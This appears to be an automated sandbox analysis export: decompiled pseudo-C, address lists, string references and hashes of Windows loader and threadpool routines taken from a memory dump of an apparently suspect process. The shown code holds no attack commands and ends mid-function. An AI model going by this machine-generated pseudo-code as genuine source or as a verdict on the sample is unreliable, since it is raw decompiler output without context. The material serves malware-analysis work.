0x3418f6cb
0x3418f6d6
0x3418f6d6
0x3418f6d9
0x3418f6dc
0x3418f6dc
0x3418f6df
0x3418f6e2
0x3418f6e5
0x3418f6e5
0x3418f6ee
0x3418f6f1
0x3418f6fb
0x3418f6fb
0x3418f6fe
0x3418f703
0x3418f713
0x3418f716
0x3418f71d
0x3418f726
0x3418f72c
0x3418f72c
0x3418f72e
0x3418f734
0x3418f739
0x3418f740
0x3418f743
0x3418f747
0x3418f74d
0x3418f74e
0x3418f74e
0x3418f753
0x3418f754
0x3418f759
0x3418f75c
0x3418f761
0x3418f764
0x3418f767
0x3418f767
0x3418f703
0x3418f76c
0x3418f76c
0x3418f774
0x3418f77a
0x3418f77e
0x3418f780
0x3418f78a
0x3418f793
0x3418f794
0x3418f799
0x3418f79b
0x3418f7a4
0x3418f7a9
0x3418f7b0
0x3418f7b8
0x3418f7b9
0x3418f7be
0x3418f7c1
0x3418f7c4
0x3418f7c4
0x3418f7c9
0x3418f7d0
0x3418f7d5
0x00000000

Strings

$, xrefs: 3418F780
$, xrefs: 3418F716

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$
API String ID: 3446177414-233714265
Opcode ID: 4c6dc310292b7c2fe28b0b44981dae934b2f0aef94d39a02b1341c414ddab214
Instruction ID: a0a05a169094ec327fbf12939bb01c3c964ce20199861cb69483f047a88444c8
Opcode Fuzzy Hash: 4c6dc310292b7c2fe28b0b44981dae934b2f0aef94d39a02b1341c414ddab214
Instruction Fuzzy Hash: 71616AB5A00B49DFEB20CFA8C5C4B9DBBB2FF48704F1044A9D515AB690CB75A981DF90

Uniqueness

Uniqueness Score: -1.00%

Function 3417A1E3 Relevance: 2.6, Strings: 2, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E3417A1E3(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, signed int* _a8, intOrPtr _a12) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				short _v22;
				char _v24;
				char* _v28;
				short _v30;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t34;
				short _t35;
				signed int* _t37;
				signed char* _t38;
				signed int _t39;
				signed char* _t40;
				intOrPtr* _t43;
				void* _t45;
				signed int _t46;
				signed int _t47;
				signed int _t49;
				signed int _t53;
				signed char* _t58;
				short _t61;
				intOrPtr* _t63;
				intOrPtr _t68;
				signed int _t71;
				signed int _t72;

				_v16 = __edx;
				_t72 = 0;
				_t68 = __ecx;
				_v8 = 0;
				_t61 = 0x42;
				_t34 = 0x44;
				_v22 = _t34;
				_t58 = 0x7ffe0385;
				_t35 = 0x40;
				_v32 = _t35;
				_v12 = __ecx;
				_v24 = _t61;
				_v20 = L"RtlpResUltimateFallbackInfo Enter";
				_t37 =  *( *[fs:0x30] + 0x50);
				_v30 = _t61;
				_v28 = L"RtlpResUltimateFallbackInfo Exit";
				if(_t37 != 0) {
					__eflags =  *_t37;
					if(__eflags == 0) {
						goto L1;
					}
					_t38 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
					L2:
					_t73 = 0x7ffe0384;
					if(( *_t38 & 0x00000001) != 0) {
						_t39 = E34183C40();
						__eflags = _t39;
						if(_t39 == 0) {
							_t40 = 0x7ffe0384;
						} else {
							_t40 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
						}
						E341FFC01( &_v24,  *_t40 & 0x000000ff);
						_t68 = _v12;
					}
					if(_t68 == 0) {
						L28:
						return 0xc000000d;
					} else {
						_t43 = _a4;
						if(_t43 == 0) {
							goto L28;
						}
						_t63 = _a8;
						_t79 = _t63;
						if(_t63 == 0) {
							goto L28;
						}
						 *_t43 = _t72;
						 *_t63 = _t72;
						_t45 = E3417B5E0(_t58, _t72, _t73, _t79, _t68, _v16,  &_v8, _a12, "true");
						if(_t45 >= 0) {
							_t46 = _v8;
							__eflags = _t46;
							if(_t46 == 0) {
								L17:
								_t72 = 0xc0000001;
								L14:
								_t47 = E34183C40();
								__eflags = _t47;
								if(_t47 != 0) {
									_t58 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
								}
								__eflags =  *_t58 & 0x00000001;
								if(( *_t58 & 0x00000001) != 0) {
									_t49 = E34183C40();
									__eflags = _t49;
									if(_t49 != 0) {
										_t73 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
										__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
									}
									E341FFC01( &_v32,  *_t73 & 0x000000ff);
									goto L16;
								} else {
									L16:
									return _t72;
								}
							}
							__eflags = _t46 - 0xffffffff;
							if(_t46 == 0xffffffff) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t46 + 0x7c)) - _t72;
							if( *((intOrPtr*)(_t46 + 0x7c)) == _t72) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t46 + 0x80)) - _t72;
							if( *((intOrPtr*)(_t46 + 0x80)) == _t72) {
								goto L17;
							}
							_t71 =  *(_t46 + 0x18);
							__eflags = _t71;
							if(_t71 == 0) {
								goto L17;
							}
							_t53 = _t46 +  *((intOrPtr*)(_t46 + 0x7c));
							__eflags = _t53;
							 *_a8 = _t71;
							 *_a4 = _t53;
							goto L14;
						}
						return _t45;
					}
				}
				L1:
				_t38 = _t58;
				goto L2;
			}

0x3417a1f0
0x3417a1f3
0x3417a1f5
0x3417a1f7
0x3417a1fa
0x3417a1fd
0x3417a1fe
0x3417a202
0x3417a209
0x3417a20a
0x3417a214
0x3417a217
0x3417a21b
0x3417a222
0x3417a225
0x3417a229
0x3417a232
0x341d2965
0x341d2967
0x00000000
0x00000000
0x341d2976
0x3417a23a
0x3417a23d
0x3417a242
0x341d2980
0x341d2985
0x341d2987
0x341d2999
0x341d2989
0x341d2992
0x341d2992
0x341d29a1
0x341d29a6
0x341d29a6
0x3417a24a
0x341d29ea
0x00000000
0x3417a250
0x3417a250
0x3417a255
0x00000000
0x00000000
0x3417a25b
0x3417a25e
0x3417a260
0x00000000
0x00000000
0x3417a26b
0x3417a274
0x3417a277
0x3417a27e
0x3417a287
0x3417a28a
0x3417a28c
0x3417a2ce
0x3417a2ce
0x3417a2b4
0x3417a2b4
0x3417a2b9
0x3417a2bb
0x341d29b7
0x341d29b7
0x3417a2c1
0x3417a2c4
0x341d29c2
0x341d29c7
0x341d29c9
0x341d29d4
0x341d29d4
0x341d29d4
0x341d29e0
0x00000000
0x3417a2ca
0x3417a2ca
0x00000000
0x3417a2ca
0x3417a2c4
0x3417a28e
0x3417a291
0x00000000
0x00000000
0x3417a293
0x3417a296
0x00000000
0x00000000
0x3417a298
0x3417a29e
0x00000000
0x00000000
0x3417a2a0
0x3417a2a3
0x3417a2a5
0x00000000
0x00000000
0x3417a2aa
0x3417a2aa
0x3417a2ad
0x3417a2b2
0x00000000
0x3417a2b2
0x3417a284
0x3417a284
0x3417a24a
0x3417a238
0x3417a238
0x00000000

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 3417A229
RtlpResUltimateFallbackInfo Enter, xrefs: 3417A21B

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 7053e3e451a413044d52a308564f819eb6b33139d1bd4833751ce705eb148cf2
Instruction ID: 5abc3bb55e429abcd5adc7a0338383569390ac09ce4767b510ee5baa1452dacc
Opcode Fuzzy Hash: 7053e3e451a413044d52a308564f819eb6b33139d1bd4833751ce705eb148cf2
Instruction Fuzzy Hash: CE41BEB4700B54DFEB05CF99D8C0B6ABBB4EF46780F1040A9E914DB294E736D900CB10

Uniqueness

Uniqueness Score: -1.00%

Function 3420314A Relevance: 2.6, Strings: 2, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E3420314A(void* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v36;
				char _v44;
				char* _v48;
				short _v50;
				char _v52;
				char* _v56;
				short _v58;
				char _v60;
				intOrPtr* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				short _t29;
				short _t30;
				void* _t31;
				signed char* _t32;
				void* _t42;
				signed char* _t46;
				signed char* _t53;
				void* _t54;
				short _t57;
				intOrPtr* _t61;
				void* _t65;
				void* _t67;
				signed char* _t69;
				void* _t70;
				signed int _t72;

				_t63 = __edx;
				_t74 = (_t72 & 0xfffffff8) - 0x3c;
				_v8 =  *0x3426b370 ^ (_t72 & 0xfffffff8) - 0x0000003c;
				_t65 = __ecx;
				_v64 = __edx;
				_t57 = 0x2e;
				_t29 = 0x30;
				_v58 = _t29;
				_t30 = 0x2c;
				_v60 = _t57;
				_v56 = L"LdrResGetRCConfig Enter";
				_v52 = _t30;
				_v50 = _t57;
				_v48 = L"LdrResGetRCConfig Exit";
				_t31 = E34183C40();
				_t53 = 0x7ffe0385;
				if(_t31 == 0) {
					_t32 = 0x7ffe0385;
				} else {
					_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
				}
				_t69 = 0x7ffe0384;
				if(( *_t32 & 0x00000001) != 0) {
					if(E34183C40() == 0) {
						_t46 = 0x7ffe0384;
					} else {
						_t46 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_t63 =  *_t46 & 0x000000ff;
					E341FFC01( &_v60,  *_t46 & 0x000000ff);
				}
				if(_v64 == 0 || _t65 == 0 || _t65 == 0xffffffff) {
					_t66 = 0xc000000d;
					goto L14;
				} else {
					_push(5);
					_push(0x18);
					_push( &_v36);
					_push( &_v44);
					_push(_t65);
					_t42 = L341B2AA0();
					_t66 = _t42;
					if(_t42 < 0) {
						L20:
						_pop(_t67);
						_pop(_t70);
						_pop(_t54);
						return L341B4B50(_t66, _t54, _v8 ^ _t74, _t63, _t67, _t70);
					}
					_t61 = _v64;
					 *_t61 = _v28;
					 *((intOrPtr*)(_t61 + 4)) = _v24;
					L14:
					if(E34183C40() != 0) {
						_t53 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t53 & 0x00000001) != 0) {
						if(E34183C40() != 0) {
							_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_t63 =  *_t69 & 0x000000ff;
						E341FFC01( &_v52,  *_t69 & 0x000000ff);
					}
					goto L20;
				}
			}

0x3420314a
0x34203152
0x3420315c
0x34203165
0x34203167
0x3420316b
0x3420316e
0x34203171
0x34203176
0x34203177
0x3420317c
0x34203184
0x34203189
0x3420318e
0x34203196
0x3420319b
0x342031a2
0x342031b4
0x342031a4
0x342031ad
0x342031ad
0x342031b9
0x342031be
0x342031c7
0x342031d9
0x342031c9
0x342031d2
0x342031d2
0x342031db
0x342031e2
0x342031e2
0x342031ec
0x34203224
0x00000000
0x342031f7
0x342031f7
0x342031f9
0x342031ff
0x34203204
0x34203205
0x34203206
0x3420320b
0x3420320f
0x3420326a
0x34203270
0x34203271
0x34203272
0x3420327d
0x3420327d
0x34203211
0x34203219
0x3420321f
0x34203229
0x34203230
0x3420323b
0x3420323b
0x34203244
0x3420324d
0x34203258
0x34203258
0x3420325e
0x34203265
0x34203265
0x00000000
0x34203244

Strings

LdrResGetRCConfig Exit, xrefs: 3420318E
LdrResGetRCConfig Enter, xrefs: 3420317C

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
API String ID: 0-118005554
Opcode ID: e3e412bf34accb09ab0a3737d73c119216cd145bf0db1286fb551a522b245cdc
Instruction ID: 0dedaf739ce8b2185960b522f81757a8bd02176e2fbcb0bed3a2a1182fb8b722
Opcode Fuzzy Hash: e3e412bf34accb09ab0a3737d73c119216cd145bf0db1286fb551a522b245cdc
Instruction Fuzzy Hash: 7E31BC75208B429FE301CB69D884F1AB7E9FF89750F04886EF8549B390EB71D905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 341A31BE Relevance: 2.6, Strings: 2, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E341A31BE(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x3426b370 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(L341858B0(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return L341B4B50(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E341B2D80();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E341B2A80();
					L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x341a31c6
0x341a31d0
0x341a31db
0x341a31df
0x341a31e0
0x341a31e6
0x341a31e7
0x341a31e8
0x341a31e9
0x341a31ec
0x341a31ee
0x341a31f6
0x341a32ae
0x341a3275
0x341a3279
0x341a327a
0x341a327b
0x341a3286
0x341a3286
0x341a3200
0x341a3204
0x341a320b
0x341a328b
0x341a3293
0x341a3297
0x341a320d
0x341a320d
0x341a320d
0x341a320f
0x341a3217
0x341a321f
0x341a3224
0x341a322c
0x341a322d
0x341a3235
0x341a3239
0x341a323d
0x341a3242
0x341a3246
0x341a324a
0x341a32a3
0x341a32a7
0x00000000
0x00000000
0x341e27e6
0x341e27e9
0x341e27f9
0x00000000
0x341a324c
0x341a324c
0x341a325a
0x341a3261
0x341a3287
0x341a3263
0x341a3269
0x341a32b6
0x341a32b6
0x341a3269
0x341a3273
0x00000000
0x341a3273

Strings

.Local\, xrefs: 341A31D5
@, xrefs: 341A322D

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: .Local\$@
API String ID: 0-380025441
Opcode ID: f6769560311d957b0553a11b8ccdbff9249f31863e8b6226e452d884834768f3
Instruction ID: 7f783bb389d5b67f88614f1f8e7a3bccec796f7f770fa1ef59b9efbc06319a07
Opcode Fuzzy Hash: f6769560311d957b0553a11b8ccdbff9249f31863e8b6226e452d884834768f3
Instruction Fuzzy Hash: 9D3192B9508B09DFE311CF28C8C0A5BFBE8EB85658F01092EF99493250D735DD098BD2

Uniqueness

Uniqueness Score: -1.00%

Function 341AA4F0 Relevance: 2.5, Strings: 2, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E341AA4F0() {
				char _v1052;
				signed int _v1056;
				void* __ebp;
				intOrPtr _t12;
				void* _t15;
				intOrPtr _t19;
				intOrPtr* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t29;

				_push(L"Cleanup Group");
				_push(L"Threadpool!");
				_push(0);
				_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
				_t12 = E341AA580(_t22, _t23, _t24, _t25, _t29);
				_v1056 = _v1056 & 0x00000000;
				 *0x34266644 = _t12;
				_push( &_v1056);
				_push(0x408);
				_push( &_v1052);
				_push(0x37);
				_t15 = E341B2D10();
				if(_t15 >= 0) {
					if(_v1056 < 4) {
						return 0xc00000e5;
					}
					 *0x34266640 = _v1052 + 1;
					_t19 =  *[fs:0x30];
					 *(_t19 + 0x250) =  *(_t19 + 0x250) & 0x00000000;
					_t20 = _t19 + 0x254;
					 *((intOrPtr*)(_t20 + 4)) = _t20;
					 *_t20 = _t20;
					return 0;
				}
				return _t15;
			}

0x341aa504
0x341aa509
0x341aa50e
0x341aa510
0x341aa513
0x341aa518
0x341aa51d
0x341aa526
0x341aa527
0x341aa530
0x341aa531
0x341aa533
0x341aa53a
0x341aa541
0x00000000
0x341aa56a
0x341aa548
0x341aa54d
0x341aa553
0x341aa55a
0x341aa55f
0x341aa562
0x00000000
0x341aa564
0x341aa569

Strings

Cleanup Group, xrefs: 341AA504
Threadpool!, xrefs: 341AA509

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: df2cffa62b2912ddb6ffbbae15530eadc2e89a53a3fe8ca3599b1b912f3bc4ca
Instruction ID: 2c73dedacb7c30fc618c384f7bba97ddb796f44e0bf48380813a0d9fe0a5bff3
Opcode Fuzzy Hash: df2cffa62b2912ddb6ffbbae15530eadc2e89a53a3fe8ca3599b1b912f3bc4ca
Instruction Fuzzy Hash: 8F01F4B2110B40EFE311CF14DD85B12B7F8EB44755F048979E658C7990EB78D904CB49

Uniqueness

Uniqueness Score: -1.00%

Function 3417C6E0 Relevance: 2.2, Strings: 1, Instructions: 960
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E3417C6E0(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				char _v60;
				signed short _v64;
				char _v65;
				signed int _v72;
				signed int _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				intOrPtr* _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int* _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void* _v140;
				signed char _v144;
				signed int _v148;
				signed int _v152;
				char _v153;
				signed char _v160;
				signed int _v164;
				void* _v168;
				signed int _v172;
				signed short _v176;
				signed short _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				void* _v196;
				signed int _v200;
				char _v204;
				intOrPtr _v208;
				signed int _v212;
				char _v220;
				char _v228;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t428;
				signed int _t429;
				signed int _t435;
				signed char _t437;
				signed int _t443;
				signed int _t446;
				signed char _t448;
				signed int _t461;
				signed int _t463;
				signed int _t465;
				signed short _t475;
				signed int _t478;
				signed int* _t480;
				signed int _t481;
				signed short _t482;
				signed int _t486;
				signed char _t488;
				signed int _t501;
				signed int _t503;
				signed int _t509;
				signed int _t510;
				signed int _t520;
				signed int _t536;
				signed int _t537;
				signed int _t539;
				signed int _t540;
				signed int _t543;
				signed int _t544;
				signed int _t546;
				signed int _t551;
				signed int _t555;
				void* _t556;
				signed int _t559;
				signed int _t565;
				signed char _t566;
				signed int _t567;
				signed int _t568;
				signed int _t569;
				signed int _t573;
				signed short _t576;
				char _t581;
				signed int _t583;
				signed int _t587;
				signed int _t588;
				signed int _t592;
				intOrPtr _t598;
				signed int _t599;
				signed int _t601;
				signed int* _t602;
				signed int _t607;
				signed int _t615;
				signed int _t617;
				signed int _t620;
				signed int _t624;
				void* _t625;
				signed int _t626;
				signed int _t627;
				intOrPtr* _t630;
				intOrPtr _t633;
				signed int _t638;
				void* _t639;
				signed char _t640;
				intOrPtr* _t642;
				signed int _t645;
				signed int _t647;
				void* _t648;

				_t612 = __edx;
				_push(0xfffffffe);
				_push(0x3424c008);
				_push(E341BAD20);
				_push( *[fs:0x0]);
				_t428 =  *0x3426b370;
				_v12 = _v12 ^ _t428;
				_t429 = _t428 ^ _t647;
				_v32 = _t429;
				_push(_t429);
				 *[fs:0x0] =  &_v20;
				_v28 = _t648 - 0xd0;
				_v100 = __edx;
				_t624 = __ecx;
				_v96 = __ecx;
				_v152 = __edx;
				_v108 = _a12;
				_v92 = __edx;
				_v65 = 0;
				_v172 = 0;
				_v164 = 0;
				_t638 = _a4;
				_t555 = _a8;
				if(_t638 >= 3 || (_t555 & 0x00000002) != 0) {
					if(_t638 > 4) {
						goto L232;
					}
					_t435 = _t555 & 0x00000041;
					if(_t435 == 0 || _t638 == 4) {
						if(_t638 != 4) {
							L9:
							_t565 = _t638;
							_v88 = _t638;
							L10:
							_v124 = _t565;
							_v8 = 0;
							_t437 =  !_t555;
							_v144 = _t437;
							if((_t437 & 0x00000010) == 0) {
								L25:
								_v80 = 1;
								_t566 = _v96;
								_t640 = _t566;
								_v160 = _t566;
								_v120 = 0;
								_t626 = 0;
								_v128 = 0;
								if((_t566 & 0x00000003) != 0) {
									asm("sbb al, al");
									_v80 =  !( ~(_t566 & 0x00000001)) & 0x00000001;
									_v160 = _t640;
								}
								_t612 = E3417E580("true", _t640, 0, 0,  &_v120);
								_t567 = _v120;
								if(_t567 == 0) {
									L76:
									if(_t612 >= 0) {
										L79:
										_v188 = _t626;
										if(_t626 != 0) {
											_push("true");
											_push(0x100);
											_push( &_v172);
											_push(_v96);
											_t432 = L3417AB70(_t555, _t626, _t640, __eflags);
											_v72 = _t432;
											__eflags = _t432;
											if(_t432 < 0) {
												L68:
												_v8 = 0xfffffffe;
												goto L233;
											}
											_v148 = _t626;
											_v76 = 0xeeee;
											_v116 = 0;
											_t568 = 0;
											_v136 = 0;
											_v132 = 0;
											_v64 = 0;
											__eflags = 0;
											_v84 = 0;
											_v168 = 0;
											while(1) {
												__eflags = _t626;
												if(_t626 == 0) {
													goto L90;
												}
												_t481 = _v124;
												_t617 = _t481 - 1;
												_v124 = _t617;
												__eflags = _t481;
												if(_t481 == 0) {
													goto L90;
												}
												__eflags = _t617;
												_t612 = _v88;
												if(_t617 == 0) {
													__eflags = _t612 - 3;
													if(_t612 == 3) {
														_v132 = _t626;
													}
												}
												__eflags = _v132;
												if(_v132 == 0) {
													L169:
													_t576 =  *(_t626 + 0xe) & 0x0000ffff;
													_v176 = _t576;
													_v180 =  *(_t626 + 0xc) & 0x0000ffff;
													_t612 = _t576 & 0x0000ffff;
													_t432 = E341694A3( *(_t626 + 0xc) & 0xffff, _t576 & 0x0000ffff,  &_v204);
													_v72 = _t432;
													__eflags = _t432;
													if(_t432 < 0) {
														goto L68;
													}
													_t612 = 8;
													_t432 = E341C6D10(_v204, 8,  &_v220);
													_v72 = _t432;
													__eflags = _t432;
													if(_t432 < 0) {
														goto L68;
													}
													_t306 = _t626 + 0x10; // 0x10
													_t612 = _t306;
													_v212 = _t612;
													_t629 = _v96;
													_t581 = (_v96 & 0xfffffffc) + _v172;
													_v140 = _t581;
													__eflags = _v220 + _t612 - _t581;
													if(_v220 + _t612 <= _t581) {
														_t475 = _v180;
														_v144 = _t475;
														_t583 =  *_v100;
														__eflags = _t583 & 0xffff0000;
														if((_t583 & 0xffff0000) == 0) {
															_t612 = _t612 + (_t475 & 0x0000ffff) * 8;
															_v212 = _t612;
															_t475 = _v176;
															_v144 = _t475;
														}
														__eflags = _t475;
														if(_t475 != 0) {
															__eflags = _v132;
															if(_v132 == 0) {
																L206:
																_t612 = _v172;
																_t478 = E341C6E26(_t629, _v172, _v144, _v188, _v172, _t583,  &_v148,  &_v136);
																__eflags = _t478;
																if(_t478 == 0) {
																	goto L172;
																}
																_t480 =  &(_v100[1]);
																_v100 = _t480;
																_v152 = _t480;
																_t626 = _v148;
																_t568 = _v136;
																continue;
															}
															__eflags = _t555 & 0x00000020;
															if((_t555 & 0x00000020) == 0) {
																goto L206;
															}
															_t626 = 0;
															_v148 = 0;
															_v76 =  *_t612;
															_t568 =  *((intOrPtr*)(_t612 + 4)) + _v188;
															__eflags = _t568 - _v140;
															if(_t568 > _v140) {
																goto L172;
															}
															_v136 = _t568;
															goto L90;
														} else {
															_t587 = _v88;
															_t486 = _t587 - _v124 - 1;
															__eflags = _t486;
															if(_t486 == 0) {
																_t645 = 0xc000008a;
																L183:
																_v72 = _t645;
																_t630 = _v92;
																__eflags = _t555 & 0x02040000;
																if((_t555 & 0x02040000) != 0) {
																	L191:
																	__eflags = _t645 - 0xc000008a;
																	if(_t645 == 0xc000008a) {
																		L193:
																		_t488 =  !_t555;
																		__eflags = _t488 & 0x00080000;
																		if((_t488 & 0x00080000) != 0) {
																			__eflags = _t488 & 0x00020000;
																			if((_t488 & 0x00020000) != 0) {
																				__eflags = _t488 & 0x00000010;
																				if((_t488 & 0x00000010) != 0) {
																					__eflags = _t587 - 3;
																					if(_t587 == 3) {
																						_v48 =  *_t630;
																						_v44 =  *((intOrPtr*)(_t630 + 4));
																						_v40 =  *((intOrPtr*)(_t630 + 8));
																						_t588 = _a4;
																						__eflags = _t588 - 4;
																						if(_t588 == 4) {
																							_v36 =  *((intOrPtr*)(_t630 + 0xc));
																						}
																						_t612 =  &_v48;
																						_t558 = _v96;
																						_t645 = L3417B9C0(_v96,  &_v48, _t588, _t555, _v108);
																						_v72 = _t645;
																						__eflags = _t645;
																						if(_t645 >= 0) {
																							_t612 = 0;
																							__eflags = 0;
																							E34170C12(_t558, 0,  &_v48, _a4);
																						}
																					}
																				}
																			}
																		}
																		L201:
																		_v8 = 0xfffffffe;
																		_t432 = _t645;
																		goto L233;
																	}
																	__eflags = _t645 - 0xc000008b;
																	if(_t645 != 0xc000008b) {
																		goto L201;
																	}
																	goto L193;
																}
																__eflags = _t587 - 3;
																if(_t587 != 3) {
																	goto L191;
																}
																_v48 =  *_t630;
																_v44 =  *((intOrPtr*)(_t630 + 4));
																_v40 =  *((intOrPtr*)(_t630 + 8));
																_t592 = _a4;
																__eflags = _t592 - 4;
																if(_t592 == 4) {
																	_v36 =  *((intOrPtr*)(_t630 + 0xc));
																}
																_t612 =  &_v48;
																_t501 = L3417B9C0(_v96,  &_v48, _t592, _t555 | 0x01000000, _v108);
																_t587 = _v88;
																__eflags = _t501 - 0xc00b0001;
																if(_t501 != 0xc00b0001) {
																	__eflags = _t501 - 0xc00b0006;
																	if(_t501 == 0xc00b0006) {
																		goto L191;
																	}
																	_t645 = _t501;
																	L190:
																	_v72 = _t645;
																}
																goto L191;
															}
															_t503 = _t486 - 1;
															__eflags = _t503;
															if(_t503 == 0) {
																_t645 = 0xc000008b;
																goto L183;
															}
															__eflags = _t503 == 1;
															if(_t503 == 1) {
																_v72 = 0xc0000204;
																_v8 = 0xfffffffe;
																_t432 = 0xc0000204;
																goto L233;
															}
															_t645 = 0xc000000d;
															_t630 = _v92;
															goto L190;
														}
													}
													L172:
													_v8 = 0xfffffffe;
													_t432 = 0xc000007b;
													goto L233;
												} else {
													_v64 = 0;
													_t482 =  *((intOrPtr*)(_v92 + 8));
													_v84 = _t482;
													__eflags = 0x000003ff & _t482;
													_v65 = (0x000003ff & _t482) == 0;
													L107:
													_t465 = _v116;
													_v116 = _v116 + 1;
